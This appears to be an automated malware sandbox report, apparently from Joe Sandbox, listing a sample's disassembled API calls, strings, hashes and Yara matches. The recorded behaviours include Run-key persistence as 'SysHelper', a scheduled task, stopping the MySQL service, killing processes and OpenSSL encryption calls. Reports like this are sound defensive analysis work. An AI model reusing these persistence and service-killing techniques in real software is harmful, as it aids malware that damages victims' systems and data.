                                                                                                                            • API String ID: 909875538-2733969777
                                                                                                                            • Opcode ID: f7176b29183e0d612565700146fcec487909d0b3c8870d1a23a98061e27142c1
                                                                                                                            • Instruction ID: 15499d9d152e89039ca69ac54aa3ed96a96855e4c846955f700f7056c0425acc
                                                                                                                            • Opcode Fuzzy Hash: f7176b29183e0d612565700146fcec487909d0b3c8870d1a23a98061e27142c1
                                                                                                                            • Instruction Fuzzy Hash: 4AF149B56083006BD760EE65CC42F9B77D89F55709F04482EF98CD7283E678DA0987AB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1503006713-0
                                                                                                                            • Opcode ID: 8707b3cd69aea085a4130ea83f189a77d50c8f1082ea57c9a4ecc17b9f7f1363
                                                                                                                            • Instruction ID: f8a7cf97401da2343448bf168c13f6a3994a7ec277660bfed55c334aa3f21e7b
                                                                                                                            • Opcode Fuzzy Hash: 8707b3cd69aea085a4130ea83f189a77d50c8f1082ea57c9a4ecc17b9f7f1363
                                                                                                                            • Instruction Fuzzy Hash: 00210831504A01ABEB267FA6DC42E0F7BE4DF81718F104C2FF44459192EE39A800DB5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • DecodePointer.KERNEL32 ref: 00487B29
                                                                                                                            • _free.LIBCMT ref: 00487B42
                                                                                                                              • Part of subcall function 00480BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0048507F,00000000,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480C13
                                                                                                                            • _free.LIBCMT ref: 00487B55
                                                                                                                            • _free.LIBCMT ref: 00487B73
                                                                                                                            • _free.LIBCMT ref: 00487B85
                                                                                                                            • _free.LIBCMT ref: 00487B96
                                                                                                                            • _free.LIBCMT ref: 00487BA1
                                                                                                                            • _free.LIBCMT ref: 00487BC5
                                                                                                                            • EncodePointer.KERNEL32(00A3A7E0), ref: 00487BCC
                                                                                                                            • _free.LIBCMT ref: 00487BE1
                                                                                                                            • _free.LIBCMT ref: 00487BF7
                                                                                                                            • _free.LIBCMT ref: 00487C1F
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3064303923-0
                                                                                                                            • Opcode ID: 5e65701c48902f68ef6406fbf7a20383cbe1bfaf1088c55980e928307351cbde
                                                                                                                            • Instruction ID: 2a3507ac28effe5e37248a6376e8cda2c2f13ca6dbe2f94e350d1be6b9853731
                                                                                                                            • Opcode Fuzzy Hash: 5e65701c48902f68ef6406fbf7a20383cbe1bfaf1088c55980e928307351cbde
                                                                                                                            • Instruction Fuzzy Hash: F9216675818590CBCB207F56BC44D1E77A5E71032C324182FE918673A1CAB8B88CBB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00471BB0
                                                                                                                            • CoCreateInstance.OLE32(0052E908,00000000,00000001,0052D568,00000000), ref: 00471BC8
                                                                                                                            • CoUninitialize.OLE32 ref: 00471BD0
                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00471C12
                                                                                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00471C22
                                                                                                                            • lstrcatW.KERNEL32(?,00560050), ref: 00471C3A
                                                                                                                            • lstrcatW.KERNEL32(?), ref: 00471C44
                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00471C68
                                                                                                                            • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00471C7A
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                            • String ID: \shell32.dll
                                                                                                                            • API String ID: 679253221-3783449302
                                                                                                                            • Opcode ID: 65f5b3423bcd66fa1a364eab39d0b0744349c40df0eb7c6fd9fecb85c134adf3
                                                                                                                            • Instruction ID: 7a5933bc3a298e598d6025b3b9a56fce2a251b265cdcf9e1af5fddfdf7b53373
                                                                                                                            • Opcode Fuzzy Hash: 65f5b3423bcd66fa1a364eab39d0b0744349c40df0eb7c6fd9fecb85c134adf3
                                                                                                                            • Instruction Fuzzy Hash: E0414C70A40219AFDB20CBA4CC88FEE7BBCEF59704F004499F509EB190D6B1AE45CB60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,004B4B72), ref: 004B49C7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004B49D7
                                                                                                                            • GetDesktopWindow.USER32 ref: 004B49FB
                                                                                                                            • GetProcessWindowStation.USER32(?,004B4B72), ref: 004B4A01
                                                                                                                            • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,004B4B72), ref: 004B4A1C
                                                                                                                            • GetLastError.KERNEL32(?,004B4B72), ref: 004B4A2A
                                                                                                                            • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,004B4B72), ref: 004B4A65
                                                                                                                            • _wcsstr.LIBCMT ref: 004B4A8A
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                            • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                            • API String ID: 2112994598-1672312481
                                                                                                                            • Opcode ID: e5bd30677be0ac3006d68687f56fc1cdc07d577a24bb8c69c7ce70cf849f50ac
                                                                                                                            • Instruction ID: eb447ca3da45c3805525e92da6640c3a47436316e7481d1e59ba4b6d3c247b8b
                                                                                                                            • Opcode Fuzzy Hash: e5bd30677be0ac3006d68687f56fc1cdc07d577a24bb8c69c7ce70cf849f50ac
                                                                                                                            • Instruction Fuzzy Hash: 57313931A401089BDB20DBB9EC466EE77B8EF98320F10061BE815D32D2EB3499159B64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F4,004B4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,004B480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,004B1D37,00000000,0046CDAE,00000001,00000001), ref: 004B4AFA
                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 004B4B05
                                                                                                                            • __vfwprintf_p.LIBCMT ref: 004B4B27
                                                                                                                              • Part of subcall function 0048BDCC: _vfprintf_helper.LIBCMT ref: 0048BDDF
                                                                                                                            • vswprintf.LIBCMT ref: 004B4B5D
                                                                                                                            • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 004B4B7E
                                                                                                                            • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 004B4BA2
                                                                                                                            • DeregisterEventSource.ADVAPI32(00000000), ref: 004B4BA9
                                                                                                                            • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 004B4BD3
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                            • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                            • API String ID: 277090408-1348657634
                                                                                                                            • Opcode ID: e5c5ddd0d45438c8ed059426f41da6f9f2f66c08b25d21021d5b48592783c861
                                                                                                                            • Instruction ID: 4e2bdff3829aa489a41b2a48ab9ab2279d0de42725087c09bcef62b72ae397aa
                                                                                                                            • Opcode Fuzzy Hash: e5c5ddd0d45438c8ed059426f41da6f9f2f66c08b25d21021d5b48592783c861
                                                                                                                            • Instruction Fuzzy Hash: E1219571648304ABE770A760CC4BFEF7B98AF98700F44481EF699861D1EBF894449767
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00472389
                                                                                                                            • _memset.LIBCMT ref: 004723B6
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004723DE
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004723E7
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 004723F4
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004723FF
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047240E
                                                                                                                            • lstrcmpW.KERNEL32(?,?), ref: 00472422
                                                                                                                            Strings
                                                                                                                            • SysHelper, xrefs: 004723D6
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0047237F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                             • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                            • API String ID: 122392481-4165002228
                                                                                                                            • Opcode ID: 4ad24fdd756bc283cb265548d0c77c149bad0681771f2b4e0ebc53ac6f9ceb4e
                                                                                                                            • Instruction ID: d683367246fdd22902d612250551eaca766244ee2758b057a6f1bdc7638c200e
                                                                                                                            • Opcode Fuzzy Hash: 4ad24fdd756bc283cb265548d0c77c149bad0681771f2b4e0ebc53ac6f9ceb4e
                                                                                                                            • Instruction Fuzzy Hash: 3D115C7190020CABDF20DBA0DC49FEE7BBCBF05705F0045A5B509E2151DBB45A89AB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF27F
                                                                                                                              • Part of subcall function 00490CFC: std::exception::_Copy_str.LIBCMT ref: 00490D15
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF294
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,004AF299,?,?,?,?,?,?,?,004AF299,?,00568238,?), ref: 00490F1F
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF2AD
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF2C2
                                                                                                                            • std::regex_error::regex_error.LIBCPMT ref: 004AF2D4
                                                                                                                              • Part of subcall function 004AEF74: std::exception::exception.LIBCMT ref: 004AEF8E
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF2E2
                                                                                                                            • std::exception::exception.LIBCMT ref: 004AF2FB
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004AF310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                            • String ID: bad function call$leS
                                                                                                                            • API String ID: 2464034642-3897984503
                                                                                                                            • Opcode ID: 85f2922f9c52bf5a9630460e357befe5319430edcd707a02154ab4582586e7f6
                                                                                                                            • Instruction ID: 5649ec8c1bbda7027ea540c0276f15566c6820ca005db5634286144776f8aebc
                                                                                                                            • Opcode Fuzzy Hash: 85f2922f9c52bf5a9630460e357befe5319430edcd707a02154ab4582586e7f6
                                                                                                                            • Instruction Fuzzy Hash: 8411DA74D4020DBBCF04EFA5C595CDDBFBCEA04348F40856ABD2597241EA74A3098B95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1077091919-0
                                                                                                                            • Opcode ID: c84f73e9f2c30da1e03c3b983ddfe2dc36ea175bff5ef7b2d27b5bbfce9000aa
                                                                                                                            • Instruction ID: 209b44514e889423210cb079ee489640a4411a90adcc9db559617a25bdd110a5
                                                                                                                            • Opcode Fuzzy Hash: c84f73e9f2c30da1e03c3b983ddfe2dc36ea175bff5ef7b2d27b5bbfce9000aa
                                                                                                                            • Instruction Fuzzy Hash: 70412832404705AFDB11BFA5DC42B9E7BE0AF44318F20482FF904A6282DB7D5645DF19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: fb6da6f6844ac9932a0c429f0466c2323644c5198917aa5647dbecfd438153bb
                                                                                                                            • Instruction ID: 74d58e29b59375b18bba7abdcb903fb2842f0246db8b6843f5f5a445de9f1a38
                                                                                                                            • Opcode Fuzzy Hash: fb6da6f6844ac9932a0c429f0466c2323644c5198917aa5647dbecfd438153bb
                                                                                                                            • Instruction Fuzzy Hash: 2DC1AF71740209DFDB18CF0CC9889AE77A6EF84704B64C92EE859CB741DB34ED468B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046DAEB
                                                                                                                            • CoCreateInstance.OLE32(00534F6C,00000000,00000001,00534F3C,?,?,0052A948,000000FF), ref: 0046DB0B
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0046DBD6
                                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,0052A948,000000FF), ref: 0046DBE3
                                                                                                                            • _memset.LIBCMT ref: 0046DC38
                                                                                                                            • CoUninitialize.OLE32 ref: 0046DC92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                            • String ID: --Task$Comment$Time Trigger Task
                                                                                                                            • API String ID: 330603062-1376107329
                                                                                                                            • Opcode ID: 1b7849c59742f402c6e71969eeff81fd0461a937302db0d679ef5a2ca0966018
                                                                                                                            • Instruction ID: e4a8e22be0aa4d1b6409904d715e5f9baa882aa64fe7f5a8b027dfe143aa83e7
                                                                                                                            • Opcode Fuzzy Hash: 1b7849c59742f402c6e71969eeff81fd0461a937302db0d679ef5a2ca0966018
                                                                                                                            • Instruction Fuzzy Hash: 5251E470A40209AFDB00DF94CC89FAE7BB9FF49B05F108459F505AB291DB75A946CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00471A1D
                                                                                                                            • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00471A32
                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?), ref: 00471A46
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00471A5B
                                                                                                                            • Sleep.KERNEL32(?), ref: 00471A75
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00471A80
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00471A9E
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00471AA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                            • String ID: MYSQL
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004C54C8
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 004C54D4
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004C54F7
                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 004C5503
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 004C5531
                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 004C555B
                                                                                                                            • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004C55F5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                            • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0047244F
                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00472469
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004724A1
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000009), ref: 004724B0
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004724B7
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 004724C1
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004724CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                            • String ID: cmd.exe
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$__except_handler4_fprintf
                                                                                                                            • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __init_pointers.LIBCMT ref: 00485141
                                                                                                                              • Part of subcall function 00487D6C: EncodePointer.KERNEL32(00000000,?,00485146,00483FFE,00567990,00000014), ref: 00487D6F
                                                                                                                              • Part of subcall function 00487D6C: __initp_misc_winsig.LIBCMT ref: 00487D8A
                                                                                                                              • Part of subcall function 00487D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004926B3
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004926C7
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004926DA
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004926ED
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00492700
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00492713
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00492726
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00492739
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0049274C
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0049275F
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00492772
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00492785
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00492798
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004927AB
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004927BE
                                                                                                                              • Part of subcall function 00487D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004927D1
                                                                                                                            • __mtinitlocks.LIBCMT ref: 00485146
                                                                                                                            • __mtterm.LIBCMT ref: 0048514F
                                                                                                                              • Part of subcall function 004851B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00485154,00483FFE,00567990,00000014), ref: 00488B62
                                                                                                                              • Part of subcall function 004851B7: _free.LIBCMT ref: 00488B69
                                                                                                                              • Part of subcall function 004851B7: DeleteCriticalSection.KERNEL32(0056AC00,?,?,00485154,00483FFE,00567990,00000014), ref: 00488B8B
                                                                                                                            • __calloc_crt.LIBCMT ref: 00485174
                                                                                                                            • __initptd.LIBCMT ref: 00485196
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0048519D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3567560977-0
                                                                                                                            • Opcode ID: 5170af13b35bfc47d9f46adbe0a5babc83d15f2cf932023ea3d694e95a477813
                                                                                                                            • Instruction ID: 84dca69921717a3d6c4d4ed2404dfee7e71615566e5f58d2805b14def0d132e2
                                                                                                                            • Opcode Fuzzy Hash: 5170af13b35bfc47d9f46adbe0a5babc83d15f2cf932023ea3d694e95a477813
                                                                                                                            • Instruction Fuzzy Hash: 4BF0C232949A112DE6353A7A6C07B4F2A809F01738B210E1FF064D52D5EF5894415799
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0048594A
                                                                                                                              • Part of subcall function 00488AF7: __mtinitlocknum.LIBCMT ref: 00488B09
                                                                                                                              • Part of subcall function 00488AF7: __amsg_exit.LIBCMT ref: 00488B15
                                                                                                                              • Part of subcall function 00488AF7: EnterCriticalSection.KERNEL32(00000000,?,004850D7,0000000D), ref: 00488B22
                                                                                                                            • _free.LIBCMT ref: 00485970
                                                                                                                              • Part of subcall function 00480BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0048507F,00000000,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480C13
                                                                                                                            • __lock.LIBCMT ref: 00485989
                                                                                                                            • ___removelocaleref.LIBCMT ref: 00485998
                                                                                                                            • ___freetlocinfo.LIBCMT ref: 004859B1
                                                                                                                            • _free.LIBCMT ref: 004859C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 626533743-0
                                                                                                                            • Opcode ID: def75f6cb6d0d672af9e4d6134873646e57e7698413cfa20c796f933f604dfc0
                                                                                                                            • Instruction ID: ca6944bc949019f202863d08ba26eb14c31e2e8531f725297b27a775bf5e9a09
                                                                                                                            • Opcode Fuzzy Hash: def75f6cb6d0d672af9e4d6134873646e57e7698413cfa20c796f933f604dfc0
                                                                                                                            • Instruction Fuzzy Hash: 0E015BB1502B00E6DA34BBA9D846B1E72A06F00739F604E5FE4646A2D5CFBC9980DB5D
                                                                                                                            Uniqueness

